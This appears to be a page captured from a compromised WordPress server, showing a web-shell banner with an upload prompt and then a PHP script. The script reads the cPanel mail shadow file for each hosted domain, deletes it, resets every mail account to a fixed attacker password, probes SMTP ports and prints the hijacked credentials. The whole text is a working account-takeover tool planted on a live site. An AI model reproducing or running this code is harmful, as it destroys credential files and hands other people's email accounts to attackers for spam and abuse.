|
Server : LiteSpeed System : Linux srv526460274 5.15.0-164-generic #174-Ubuntu SMP Fri Nov 14 20:25:16 UTC 2025 x86_64 User : kerao9884 ( 1082) PHP Version : 8.0.30 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare, Directory : /home/koplo99.net/public_html/wp-admin/ |
Upload File : |
<?php
set_time_limit(0);
error_reporting(0);
ini_set('max_execution_time',0);
ini_set('memory_limit',-1);
// port to scan
$ports=array(587, 26, 25, 465);
//curent user
$user=get_current_user();
function rndStr($length = 10)
{
$characters = '123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
$charactersLength = strlen($characters);
$randomString = '';
for ($i = 0; $i < $length; $i++) {
$randomString .= $characters[rand(0, $charactersLength - 1)];
}
return $randomString;
}
$salt = rndStr();
// Smtp password
$password="n0b0dy_smtp_pass";
//crypt
$pwd = crypt($password, '$6$'.$salt.'$');
// host name
$t = $_SERVER['SERVER_NAME'];
//edit
$t = @str_replace("www.","",$t);
$dirs = glob('/home/'.$user.'/etc/*', GLOB_ONLYDIR);
foreach($dirs as $dir){
$ex = explode("/",$dir);
$site = $ex[count($ex)-1];
//get users
@$passwd = file_get_contents('/home/'.$user.'/etc/'.$site.'/shadow');
//edit
$ex=explode("\r\n",$passwd);
//backup shadow
@link('/home/'.$user.'/etc/'.$site.'/shadow','/home/'.$user.'/etc/'.$site.'/shadow.'.$password.'.bak');
//delete shadow
@unlink('/home/'.$user.'/etc/'.$site.'/shadow');
// :D
foreach($ex as $ex){
$ex=explode(':',$ex);
$e= $ex[0];
if ($e){
$b=fopen('/home/'.$user.'/etc/'.$site.'/shadow','ab');
fwrite($b,$e.':'.$pwd.':16249:::::'."\r\n");fclose($b);
// $siteList = [];
foreach($ports as $pport){
// if(in_array($site, $siteList)){
// continue;
// }
$connection = @fsockopen($site, $pport);
if (is_resource($connection))
{
echo $site.'|'.$pport.'|'.$e.'@'.$site.'|'.$password."\n";
break;
}
// $siteList[] = $site;
}
}
}
}
?>